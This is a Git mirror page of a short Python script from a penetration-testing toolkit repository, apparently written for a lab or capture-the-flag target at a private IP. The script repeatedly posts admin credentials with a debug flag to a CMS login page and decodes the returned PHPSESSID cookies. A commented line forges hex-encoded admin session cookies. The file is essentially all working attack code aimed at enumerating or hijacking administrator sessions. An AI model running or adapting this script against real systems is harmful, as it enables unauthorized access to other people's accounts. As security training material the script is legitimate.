Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 11:09:09 -04:00
Code Issues Packages Projects Releases Wiki Activity
sec-pentesting-toolkit/Web_Security/SQLi/sqli_COOKIE_brute.py
bt3gl 662953c17a web exploit
2014-11-19 15:55:54 -05:00

48 lines
694 B
Python
Executable File
Raw Blame History

#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)
Reference in New Issue View Git Blame Copy Permalink